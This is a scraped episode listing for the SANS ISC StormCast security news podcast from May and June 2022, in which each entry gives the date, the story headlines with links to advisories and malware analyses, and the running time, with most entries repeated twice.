ISC StormCast for Friday, June 17th, 2022

Houdini is Back Delivered Through a JavaScript Dropper https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/ Drifting Cloud: Zero-Day Sophos Firewall Exploitation https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack https://www.zerodayinitiative.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack Cisco Email Security Appliance and Cisco Secure Email and Web Manager https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-esa-auth-bypass-66kEcxQD Analyzing the Fastjson "Auto Type Bypass" RCE vulnerability https://jfrog.com/blog/cve-2022-25845-analyzing-the-fastjson-auto-type-bypass-rce-vulnerability/
6/17/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Friday, June 17th, 2022

Houdini is Back Delivered Through a JavaScript Dropper https://isc.sans.edu/forums/diary/Houdini+is+Back+Delivered+Through+a+JavaScript+Dropper/28746/ Drifting Cloud: Zero-Day Sophos Firewall Exploitation https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ Exploiting a Heap Overflow in the FreeBSD Wi-Fi Stack https://www.zerodayinitiative.com/blog/2022/6/15/cve-2022-23088-exploiting-a-heap-overflow-in-the-freebsd-wi-fi-stack Cisco Email Security Appliance and Cisco Secure Email and Web Manager https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sma-esa-auth-bypass-66kEcxQD Analyzing the Fastjson "Auto Type Bypass" RCE vulnerability https://jfrog.com/blog/cve-2022-25845-analyzing-the-fastjson-auto-type-bypass-rce-vulnerability/
6/17/20225 minutes, 56 seconds
Episode Artwork

ISC StormCast for Thursday, June 16th, 2022

Terraforming Honeypots: Using IaaC & Cloud to Attract Attacks https://isc.sans.edu/forums/diary/Terraforming+Honeypots+Installing+DShield+Sensors+in+the+Cloud/28748/ Zimbra Email - Stealing Clear=Text Credenitals via Memcache Injection https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/ Cloud Middleware Dataset https://github.com/wiz-sec/cloud-middleware-dataset CVE-2022-26937 Windows Network File System NLM Portmap Stack Buffer Overflow https://www.zerodayinitiative.com/blog/2022/6/7/cve-2022-26937-microsoft-windows-network-file-system-nlm-portmap-stack-buffer-overflow Citrix Application Delivery Management Security Bulletin https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512 Hardcoded Backdoor User and Outdated Software Components in Nexans FTTO GigaSwitch https://sec-consult.com/vulnerability-lab/advisory/hardcoded-backdoor-user-outdated-software-components-nexans-ftto-gigaswitch/
6/16/20225 minutes, 57 seconds
Episode Artwork

ISC StormCast for Thursday, June 16th, 2022

Terraforming Honeypots: Using IaaC & Cloud to Attract Attacks https://isc.sans.edu/forums/diary/Terraforming+Honeypots+Installing+DShield+Sensors+in+the+Cloud/28748/ Zimbra Email - Stealing Clear=Text Credenitals via Memcache Injection https://blog.sonarsource.com/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/ Cloud Middleware Dataset https://github.com/wiz-sec/cloud-middleware-dataset CVE-2022-26937 Windows Network File System NLM Portmap Stack Buffer Overflow https://www.zerodayinitiative.com/blog/2022/6/7/cve-2022-26937-microsoft-windows-network-file-system-nlm-portmap-stack-buffer-overflow Citrix Application Delivery Management Security Bulletin https://support.citrix.com/article/CTX460016/citrix-application-delivery-management-security-bulletin-for-cve202227511-and-cve202227512 Hardcoded Backdoor User and Outdated Software Components in Nexans FTTO GigaSwitch https://sec-consult.com/vulnerability-lab/advisory/hardcoded-backdoor-user-outdated-software-components-nexans-ftto-gigaswitch/
6/16/20225 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, June 15th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+June+2022+Patch+Tuesday/28742/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html SynLapse Vulnerability https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Hertzbleed Attack https://www.hertzbleed.com
6/15/20227 minutes, 5 seconds
Episode Artwork

ISC StormCast for Wednesday, June 15th, 2022

Microsoft Patch Tuesday https://isc.sans.edu/forums/diary/Microsoft+June+2022+Patch+Tuesday/28742/ Adobe Patches https://helpx.adobe.com/security/security-bulletin.html SynLapse Vulnerability https://orca.security/resources/blog/synlapse-critical-azure-synapse-analytics-service-vulnerability/ Hertzbleed Attack https://www.hertzbleed.com
6/15/20227 minutes, 5 seconds
Episode Artwork

ISC StormCast for Tuesday, June 14th, 2022

Translating Saitama's DNS Tunneling https://isc.sans.edu/forums/diary/Translating+Saitamas+DNS+tunneling+messages/28738/ Travis CI Logs Expose Users to Cyber Attacks https://blog.aquasec.com/travis-ci-security Linux Threat Hunting: "Syslogk" a kernel rootkit found under development in the wild https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/ Mitel Desk Phone Backdoor https://blog.syss.com/posts/rooting-mitel-desk-phones-through-the-backdoor/
6/14/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Tuesday, June 14th, 2022

Translating Saitama's DNS Tunneling https://isc.sans.edu/forums/diary/Translating+Saitamas+DNS+tunneling+messages/28738/ Travis CI Logs Expose Users to Cyber Attacks https://blog.aquasec.com/travis-ci-security Linux Threat Hunting: "Syslogk" a kernel rootkit found under development in the wild https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/ Mitel Desk Phone Backdoor https://blog.syss.com/posts/rooting-mitel-desk-phones-through-the-backdoor/
6/14/20225 minutes, 48 seconds
Episode Artwork

ISC StormCast for Monday, June 13th, 2022

EPSScall: An Exploit Prediction Scoring System App https://isc.sans.edu/forums/diary/EPSScall+An+Exploit+Prediction+Scoring+System+App/28732/ PACMan Attack https://pacmanattack.com https://twitter.com/wdormann/status/1535245913857351680 Carrier LenelS2 HID Mercury access panel vulnerability https://www.cisa.gov/uscert/ics/advisories/icsa-22-153-01 Malicious Python Modules https://www.bleepingcomputer.com/news/security/pypi-package-keep-mistakenly-included-a-password-stealer/
6/13/20226 minutes, 21 seconds
Episode Artwork

ISC StormCast for Monday, June 13th, 2022

EPSScall: An Exploit Prediction Scoring System App https://isc.sans.edu/forums/diary/EPSScall+An+Exploit+Prediction+Scoring+System+App/28732/ PACMan Attack https://pacmanattack.com https://twitter.com/wdormann/status/1535245913857351680 Carrier LenelS2 HID Mercury access panel vulnerability https://www.cisa.gov/uscert/ics/advisories/icsa-22-153-01 Malicious Python Modules https://www.bleepingcomputer.com/news/security/pypi-package-keep-mistakenly-included-a-password-stealer/
6/13/20226 minutes, 21 seconds
Episode Artwork

ISC StormCast for Friday, June 10th, 2022

TA570 QBot attempts to exploit CVE-2022-30190 (Follina) https://isc.sans.edu/forums/diary/TA570+Qakbot+Qbot+tries+CVE202230190+Follina+exploit+msmsdt/28728/ Analysis of a Facebook Phishing Campaign https://pixmsecurity.com/blog/blog/phishing-tactics-how-a-threat-actor-stole-1m-credentials-in-4-months/ Zyxel Security Advisory https://www.zyxel.com/support/Zyxel-security-advisory-for-CRLF-injection-vulnerability-in-some-legacy-firewalls.shtml Fujitsu Centricstor Vulnerability https://research.nccgroup.com/2022/05/27/technical-advisory-fujitsu-centricstor-control-center-v8-1-unauthenticated-command-injection/ Meeting Owl Vulnerablities https://www.modzero.com/static/meetingowl/Meeting_Owl_Pro_Security_Disclosure_Report_RELEASE.pdf
6/10/20228 minutes, 34 seconds
Episode Artwork

ISC StormCast for Friday, June 10th, 2022

TA570 QBot attempts to exploit CVE-2022-30190 (Follina) https://isc.sans.edu/forums/diary/TA570+Qakbot+Qbot+tries+CVE202230190+Follina+exploit+msmsdt/28728/ Analysis of a Facebook Phishing Campaign https://pixmsecurity.com/blog/blog/phishing-tactics-how-a-threat-actor-stole-1m-credentials-in-4-months/ Zyxel Security Advisory https://www.zyxel.com/support/Zyxel-security-advisory-for-CRLF-injection-vulnerability-in-some-legacy-firewalls.shtml Fujitsu Centricstor Vulnerability https://research.nccgroup.com/2022/05/27/technical-advisory-fujitsu-centricstor-control-center-v8-1-unauthenticated-command-injection/ Meeting Owl Vulnerablities https://www.modzero.com/static/meetingowl/Meeting_Owl_Pro_Security_Disclosure_Report_RELEASE.pdf
6/10/20228 minutes, 34 seconds
Episode Artwork

ISC StormCast for Thursday, June 9th, 2022

SANS RSA Panel (sorry, video no longer available) Atlassian Confluence Attacks https://isc.sans.edu/forums/diary/Atlassian+Confluence+Exploits+Seen+By+Our+Honeypots+CVE202226134/28722/ Fake CClenaer Malvertisements https://blog.avast.com/fakecrack-campaign Weakness in Verbatim Keypad Secure USB Drive https://blog.syss.com/posts/hacking-usb-flash-drives-part-1/
6/9/20225 minutes, 55 seconds
Episode Artwork

ISC StormCast for Thursday, June 9th, 2022

SANS RSA Panel (sorry, video no longer available) Atlassian Confluence Attacks https://isc.sans.edu/forums/diary/Atlassian+Confluence+Exploits+Seen+By+Our+Honeypots+CVE202226134/28722/ Fake CClenaer Malvertisements https://blog.avast.com/fakecrack-campaign Weakness in Verbatim Keypad Secure USB Drive https://blog.syss.com/posts/hacking-usb-flash-drives-part-1/
6/9/20225 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, June 8th, 2022

The Trouble With Microsoft's Troubleshooters https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd QBot Uses Follina https://twitter.com/threatinsight/status/1534227444915482625 Deadbolt Ransomware https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html Google Android Updates https://source.android.com/security/bulletin/2022-06-01?hl=en
6/8/20225 minutes, 34 seconds
Episode Artwork

ISC StormCast for Wednesday, June 8th, 2022

The Trouble With Microsoft's Troubleshooters https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd QBot Uses Follina https://twitter.com/threatinsight/status/1534227444915482625 Deadbolt Ransomware https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html Google Android Updates https://source.android.com/security/bulletin/2022-06-01?hl=en
6/8/20225 minutes, 34 seconds
Episode Artwork

ISC StormCast for Tuesday, June 7th, 2022

MS-MSDT RTF Maldocs Analysis oledump Plugins https://isc.sans.edu/forums/diary/msmsdt+RTF+Maldoc+Analysis+oledump+Plugins/28718/ Cybercriminals Exploit Reverse Tunnel Services and URL Shorteners https://cloudsek.com/whitepapers_reports/cybercriminals-exploit-reverse-tunnel-services-and-url-shorteners-to-launch-large-scale-phishing-campaigns/ Unpatched Horde Webmail Bug https://blog.sonarsource.com/horde-webmail-rce-via-email/ Clickstudio (Passwordstate) Code Signing Cert Used by Follina Malware https://cloudsek.com/whitepapers_reports/cybercriminals-exploit-reverse-tunnel-services-and-url-shorteners-to-launch-large-scale-phishing-campaigns/
6/7/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, June 7th, 2022

MS-MSDT RTF Maldocs Analysis oledump Plugins https://isc.sans.edu/forums/diary/msmsdt+RTF+Maldoc+Analysis+oledump+Plugins/28718/ Cybercriminals Exploit Reverse Tunnel Services and URL Shorteners https://cloudsek.com/whitepapers_reports/cybercriminals-exploit-reverse-tunnel-services-and-url-shorteners-to-launch-large-scale-phishing-campaigns/ Unpatched Horde Webmail Bug https://blog.sonarsource.com/horde-webmail-rce-via-email/ Clickstudio (Passwordstate) Code Signing Cert Used by Follina Malware https://cloudsek.com/whitepapers_reports/cybercriminals-exploit-reverse-tunnel-services-and-url-shorteners-to-launch-large-scale-phishing-campaigns/
6/7/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, June 6th, 2022

Sandbox Evasion... With Just a Filename! https://isc.sans.edu/forums/diary/Sandbox+Evasion+With+Just+a+Filename/28708/ Atlassian Exploit Released https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ GitLab Critical Security Release https://about.gitlab.com/releases/2022/06/01/critical-security-release-gitlab-15-0-1-released/ U-Boot Vulnerablities https://research.nccgroup.com/2022/06/03/technical-advisory-multiple-vulnerabilities-in-u-boot-cve-2022-30790-cve-2022-30552/ Unisoc Baseband Chip Vulnerability https://research.checkpoint.com/2022/vulnerability-within-the-unisoc-baseband/
6/6/20225 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, June 6th, 2022

Sandbox Evasion... With Just a Filename! https://isc.sans.edu/forums/diary/Sandbox+Evasion+With+Just+a+Filename/28708/ Atlassian Exploit Released https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ GitLab Critical Security Release https://about.gitlab.com/releases/2022/06/01/critical-security-release-gitlab-15-0-1-released/ U-Boot Vulnerablities https://research.nccgroup.com/2022/06/03/technical-advisory-multiple-vulnerabilities-in-u-boot-cve-2022-30790-cve-2022-30552/ Unisoc Baseband Chip Vulnerability https://research.checkpoint.com/2022/vulnerability-within-the-unisoc-baseband/
6/6/20225 minutes, 28 seconds
Episode Artwork

ISC StormCast for Friday, June 3rd, 2022

Quick Answers in Incident Response RECmd.exe https://isc.sans.edu/forums/diary/Quick+Answers+in+Incident+Response+RECmdexe/28706/ Zero-Day Exploitation of Atlassian Confluence https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html Korenix Technology JetPort Backdoor https://sec-consult.com/vulnerability-lab/advisory/backdoor-account-in-korenix-technology-jetport-series/ Elasticsearch Data Wiped https://www.secureworks.com/blog/unsecured-elasticsearch-data-replaced-with-ransom-note
6/3/20226 minutes
Episode Artwork

ISC StormCast for Friday, June 3rd, 2022

Quick Answers in Incident Response RECmd.exe https://isc.sans.edu/forums/diary/Quick+Answers+in+Incident+Response+RECmdexe/28706/ Zero-Day Exploitation of Atlassian Confluence https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/ https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html Korenix Technology JetPort Backdoor https://sec-consult.com/vulnerability-lab/advisory/backdoor-account-in-korenix-technology-jetport-series/ Elasticsearch Data Wiped https://www.secureworks.com/blog/unsecured-elasticsearch-data-replaced-with-ransom-note
6/3/20226 minutes
Episode Artwork

ISC StormCast for Thursday, June 2nd, 2022

HTML Phishing Attachments - Now With Anti-Analysis Features https://isc.sans.edu/forums/diary/HTML+phishing+attachments+now+with+antianalysis+features/28702/ Unofficial Patch for CVE-2022-30190 (Follina) https://blog.0patch.com/2022/06/free-micropatches-for-follina-microsoft.html Windows Search Vulnerability https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/ Call Forwarding Used to Compromise WhatsApp Accounts https://www.linkedin.com/posts/fb1h2s_beware-here-is-how-whatsapp-accounts-are-activity-6934386561048264704-NnFf/?utm_source=linkedin_share&utm_medium=member_desktop_web Badkeys in Fuji Xerox and Canon Printers https://fermatattack.secvuln.info
6/2/20225 minutes, 55 seconds
Episode Artwork

ISC StormCast for Thursday, June 2nd, 2022

HTML Phishing Attachments - Now With Anti-Analysis Features https://isc.sans.edu/forums/diary/HTML+phishing+attachments+now+with+antianalysis+features/28702/ Unofficial Patch for CVE-2022-30190 (Follina) https://blog.0patch.com/2022/06/free-micropatches-for-follina-microsoft.html Windows Search Vulnerability https://www.bleepingcomputer.com/news/security/new-windows-search-zero-day-added-to-microsoft-protocol-nightmare/ Call Forwarding Used to Compromise WhatsApp Accounts https://www.linkedin.com/posts/fb1h2s_beware-here-is-how-whatsapp-accounts-are-activity-6934386561048264704-NnFf/?utm_source=linkedin_share&utm_medium=member_desktop_web Badkeys in Fuji Xerox and Canon Printers https://fermatattack.secvuln.info
6/2/20225 minutes, 55 seconds
Episode Artwork

ISC StormCast for Wednesday, June 1st, 2022

Follina Update https://isc.sans.edu/forums/diary/First+Exploitation+of+Follina+Seen+in+the+Wild/28698/ https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme+CVE202230190/28694/ Open Automation Software Platform Vulnerability https://blog.talosintelligence.com/2022/05/vuln-spotlight-open-automation-platform.html Over 3.6 million MySQL servers found exposed on the Internet https://www.bleepingcomputer.com/news/security/over-36-million-mysql-servers-found-exposed-on-the-internet/
6/1/20225 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, June 1st, 2022

Follina Update https://isc.sans.edu/forums/diary/First+Exploitation+of+Follina+Seen+in+the+Wild/28698/ https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme+CVE202230190/28694/ Open Automation Software Platform Vulnerability https://blog.talosintelligence.com/2022/05/vuln-spotlight-open-automation-platform.html Over 3.6 million MySQL servers found exposed on the Internet https://www.bleepingcomputer.com/news/security/over-36-million-mysql-servers-found-exposed-on-the-internet/
6/1/20225 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, May 31st, 2022

New Microsoft Office Attack Vector via "ms-msdt" Protocol Scheme https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme/28694/
5/30/20227 minutes, 47 seconds
Episode Artwork

ISC StormCast for Tuesday, May 31st, 2022

New Microsoft Office Attack Vector via "ms-msdt" Protocol Scheme https://isc.sans.edu/forums/diary/New+Microsoft+Office+Attack+Vector+via+msmsdt+Protocol+Scheme/28694/
5/30/20227 minutes, 47 seconds
Episode Artwork

ISC StormCast for Friday, May 27th, 2022

Huge Signed PE Files https://isc.sans.edu/forums/diary/Huge+Signed+PE+File/28686/ VMWare Authentication Bypass PoC https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive/ Quanta Server BMC Vulnerability https://eclypsium.com/2022/05/26/quanta-servers-still-vulnerable-to-pantsdown/ Windows 11 and Server 2022 Update Prevent Trend Micro Ransomware Protection https://success.trendmicro.com/dcx/s/solution/000291066?language=en_US Nate Street: Advancing SIEM Log Management Strategies through Vendor-Agnostic Measurement https://www.sans.edu/cyber-research/38685/
5/27/202215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Friday, May 27th, 2022

Huge Signed PE Files https://isc.sans.edu/forums/diary/Huge+Signed+PE+File/28686/ VMWare Authentication Bypass PoC https://www.horizon3.ai/vmware-authentication-bypass-vulnerability-cve-2022-22972-technical-deep-dive/ Quanta Server BMC Vulnerability https://eclypsium.com/2022/05/26/quanta-servers-still-vulnerable-to-pantsdown/ Windows 11 and Server 2022 Update Prevent Trend Micro Ransomware Protection https://success.trendmicro.com/dcx/s/solution/000291066?language=en_US Nate Street: Advancing SIEM Log Management Strategies through Vendor-Agnostic Measurement https://www.sans.edu/cyber-research/38685/
5/27/202215 minutes, 40 seconds
Episode Artwork

ISC StormCast for Thursday, May 26th, 2022

Using NMAP to Assess Hosts in Load Balanced Clusters https://isc.sans.edu/forums/diary/Using+NMAP+to+Assess+Hosts+in+Load+Balanced+Clusters/28682/ Attacker Modifying Libraries Claims "Research" https://www.bleepingcomputer.com/news/security/hacker-says-hijacking-libraries-stealing-aws-keys-was-ethical-research/ Heroku GitHub Integration Re-Enabled Again https://blog.heroku.com/github-integration-update Serious security vulnerablity in Tails 5.0 https://tails.boum.org/security/prototype_pollution/index.en.html Google Chrome Update https://chromereleases.googleblog.com/2022/05/stable-channel-update-for-desktop_24.html
5/26/20225 minutes, 9 seconds
Episode Artwork

ISC StormCast for Thursday, May 26th, 2022

Using NMAP to Assess Hosts in Load Balanced Clusters https://isc.sans.edu/forums/diary/Using+NMAP+to+Assess+Hosts+in+Load+Balanced+Clusters/28682/ Attacker Modifying Libraries Claims "Research" https://www.bleepingcomputer.com/news/security/hacker-says-hijacking-libraries-stealing-aws-keys-was-ethical-research/ Heroku GitHub Integration Re-Enabled Again https://blog.heroku.com/github-integration-update Serious security vulnerablity in Tails 5.0 https://tails.boum.org/security/prototype_pollution/index.en.html Google Chrome Update https://chromereleases.googleblog.com/2022/05/stable-channel-update-for-desktop_24.html
5/26/20225 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, May 25th, 2022

ctx Python Library Updated with "Extra" Features https://isc.sans.edu/forums/diary/ctx+Python+Library+Updated+with+Extra+Features/28678/ Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/ VMWare Exploit About to Be Released https://twitter.com/Horizon3Attack/status/1528935531333177344 Zyxel Firewalls, AP Controllers, APs Patch https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml
5/25/20225 minutes, 18 seconds
Episode Artwork

ISC StormCast for Wednesday, May 25th, 2022

ctx Python Library Updated with "Extra" Features https://isc.sans.edu/forums/diary/ctx+Python+Library+Updated+with+Extra+Features/28678/ Zoom Updates https://explore.zoom.us/en/trust/security/security-bulletin/ VMWare Exploit About to Be Released https://twitter.com/Horizon3Attack/status/1528935531333177344 Zyxel Firewalls, AP Controllers, APs Patch https://www.zyxel.com/support/multiple-vulnerabilities-of-firewalls-AP-controllers-and-APs.shtml
5/25/20225 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, May 24th, 2022

Attacker Scanning for jQuery-File-Upload https://isc.sans.edu/forums/diary/Attacker+Scanning+for+jQueryFileUpload/28674/ Oracle Security Alert Advisory - CVE-2022-21500 https://www.oracle.com/security-alerts/alert-cve-2022-21500.html How to find NPM dependencies vulnerable to account hijacking https://www.theregister.com/2022/05/23/npm_dependencies_vulnerable/ Pre-hijacked accounts https://arxiv.org/pdf/2205.10174.pdf
5/24/20225 minutes, 26 seconds
Episode Artwork

ISC StormCast for Tuesday, May 24th, 2022

Attacker Scanning for jQuery-File-Upload https://isc.sans.edu/forums/diary/Attacker+Scanning+for+jQueryFileUpload/28674/ Oracle Security Alert Advisory - CVE-2022-21500 https://www.oracle.com/security-alerts/alert-cve-2022-21500.html How to find NPM dependencies vulnerable to account hijacking https://www.theregister.com/2022/05/23/npm_dependencies_vulnerable/ Pre-hijacked accounts https://arxiv.org/pdf/2205.10174.pdf
5/24/20225 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, May 23rd, 2022

A "Zip Bomb" to Bypass Security Controls & Sandboxes https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/ Cisco IOS XR Software Health Check Open Port Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-redis-ABJyE5xK pwn2own Vancouver 2022 Results https://www.zerodayinitiative.com/blog/2022/5/18/pwn2own-vancouver-2022-the-results#three Malicious PyPi Packages Drop Cobalt Strike https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux Security Advisory for BR200, BR500 and PSV-2021-0286 https://kb.netgear.com/000064712/Security-Advisory-for-Multiple-Security-Vulnerabilities-on-BR200-and-BR500-PSV-2021-0286
5/23/20226 minutes, 10 seconds
Episode Artwork

ISC StormCast for Monday, May 23rd, 2022

A "Zip Bomb" to Bypass Security Controls & Sandboxes https://isc.sans.edu/forums/diary/A+Zip+Bomb+to+Bypass+Security+Controls+Sandboxes/28670/ Cisco IOS XR Software Health Check Open Port Vulnerability https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxr-redis-ABJyE5xK pwn2own Vancouver 2022 Results https://www.zerodayinitiative.com/blog/2022/5/18/pwn2own-vancouver-2022-the-results#three Malicious PyPi Packages Drop Cobalt Strike https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux Security Advisory for BR200, BR500 and PSV-2021-0286 https://kb.netgear.com/000064712/Security-Advisory-for-Multiple-Security-Vulnerabilities-on-BR200-and-BR500-PSV-2021-0286
5/23/20226 minutes, 10 seconds
Episode Artwork

ISC StormCast for Friday, May 20th, 2022

Bumblebee Malware from TransferXL URLs https://isc.sans.edu/forums/diary/Bumblebee+Malware+from+TransferXL+URLs/28664/ Microsoft Out-of-Band Update fixes Authentication Issues https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#you-might-see-authentication-failures-on-the-server-or-client-for-services Sonicwall Patch for SMA 1000 https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0010 QNAP NAS Deadbolt Ransomware https://www.qnap.com/en/security-news/2022/take-immediate-actions-to-secure-qnap-nas-and-update-qts-to-the-latest-available-version 380,000 open Kubernetes API Servers https://www.shadowserver.org/news/over-380-000-open-kubernetes-api-servers/ Doj Annnounces New Polciy for Charging Cases under the Computer Fraud and Abuse Act https://www.justice.gov/opa/pr/department-justice-announces-new-policy-charging-cases-under-computer-fraud-and-abuse-act
5/20/20226 minutes, 1 second
Episode Artwork

ISC StormCast for Friday, May 20th, 2022

Bumblebee Malware from TransferXL URLs https://isc.sans.edu/forums/diary/Bumblebee+Malware+from+TransferXL+URLs/28664/ Microsoft Out-of-Band Update fixes Authentication Issues https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#you-might-see-authentication-failures-on-the-server-or-client-for-services Sonicwall Patch for SMA 1000 https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0010 QNAP NAS Deadbolt Ransomware https://www.qnap.com/en/security-news/2022/take-immediate-actions-to-secure-qnap-nas-and-update-qts-to-the-latest-available-version 380,000 open Kubernetes API Servers https://www.shadowserver.org/news/over-380-000-open-kubernetes-api-servers/ Doj Annnounces New Polciy for Charging Cases under the Computer Fraud and Abuse Act https://www.justice.gov/opa/pr/department-justice-announces-new-policy-charging-cases-under-computer-fraud-and-abuse-act
5/20/20226 minutes, 1 second
Episode Artwork

ISC StormCast for Thursday, May 19th, 2022

VMWare Flaws https://core.vmware.com/vmsa-2022-0014-questions-answers-faq https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/ Tesla BLE Proximity Authentication Vulnerable to Relay Attacks https://research.nccgroup.com/2022/05/15/technical-advisory-ble-proximity-authentication-vulnerable-to-relay-attacks/ Credit Card Scraping via Malicious PHP Code https://www.ic3.gov/Media/News/2022/220516.pdf Microsoft updating Delegated Admin Privileges https://docs.microsoft.com/en-gb/partner-center/announcements/2022-may#13
5/19/20226 minutes, 48 seconds
Episode Artwork

ISC StormCast for Thursday, May 19th, 2022

VMWare Flaws https://core.vmware.com/vmsa-2022-0014-questions-answers-faq https://blog.barracuda.com/2022/05/17/threat-spotlight-attempts-to-exploit-new-vmware-vulnerabilities/ Tesla BLE Proximity Authentication Vulnerable to Relay Attacks https://research.nccgroup.com/2022/05/15/technical-advisory-ble-proximity-authentication-vulnerable-to-relay-attacks/ Credit Card Scraping via Malicious PHP Code https://www.ic3.gov/Media/News/2022/220516.pdf Microsoft updating Delegated Admin Privileges https://docs.microsoft.com/en-gb/partner-center/announcements/2022-may#13
5/19/20226 minutes, 48 seconds
Episode Artwork

ISC StormCast for Wednesday, May 18th, 2022

Use Your Browser Internal Password Vault... or Not? https://isc.sans.edu/forums/diary/Use+Your+Browser+Internal+Password+Vault+or+Not/28658/ SQL Server Brute Forcing https://twitter.com/MsftSecIntel/status/1526680337216114693 UpdateAgent Adapts Again https://www.jamf.com/blog/updateagent-adapts-again/ Updated Exploited Vulnerabilities https://www.cisa.gov/uscert/ncas/current-activity/2022/05/10/cisa-adds-one-known-exploited-vulnerability-catalog
5/18/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Wednesday, May 18th, 2022

Use Your Browser Internal Password Vault... or Not? https://isc.sans.edu/forums/diary/Use+Your+Browser+Internal+Password+Vault+or+Not/28658/ SQL Server Brute Forcing https://twitter.com/MsftSecIntel/status/1526680337216114693 UpdateAgent Adapts Again https://www.jamf.com/blog/updateagent-adapts-again/ Updated Exploited Vulnerabilities https://www.cisa.gov/uscert/ncas/current-activity/2022/05/10/cisa-adds-one-known-exploited-vulnerability-catalog
5/18/20226 minutes, 9 seconds
Episode Artwork

ISC StormCast for Tuesday, May 17th, 2022

Apple Patches Everything https://isc.sans.edu/forums/diary/Apple+Patches+Everything/28654/ Evil Never Sleeps: When Wireless Malware Stays on After Turning Off iPhones https://arxiv.org/pdf/2205.06114.pdf Third-Party Web Trackers Log What You Type Before Submitting https://homes.esat.kuleuven.be/~asenol/leaky-forms/
5/17/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Tuesday, May 17th, 2022

Apple Patches Everything https://isc.sans.edu/forums/diary/Apple+Patches+Everything/28654/ Evil Never Sleeps: When Wireless Malware Stays on After Turning Off iPhones https://arxiv.org/pdf/2205.06114.pdf Third-Party Web Trackers Log What You Type Before Submitting https://homes.esat.kuleuven.be/~asenol/leaky-forms/
5/17/20226 minutes, 18 seconds
Episode Artwork

ISC StormCast for Monday, May 16th, 2022

From 0-Day to Mirai: 7 days of BIG-IP Exploits https://isc.sans.edu/forums/diary/From+0Day+to+Mirai+7+days+of+BIGIP+Exploits/28644/ Sonicwall Vulnerabilities Patched https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0009 Zonealarm Patch https://www.zonealarm.com/software/extreme-security/release-history Taking over npm account https://thehackerblog.com/zero-days-without-incident-compromising-angular-via-expired-npm-publisher-email-domains-7kZplW4x/
5/16/20226 minutes, 26 seconds
Episode Artwork

ISC StormCast for Monday, May 16th, 2022

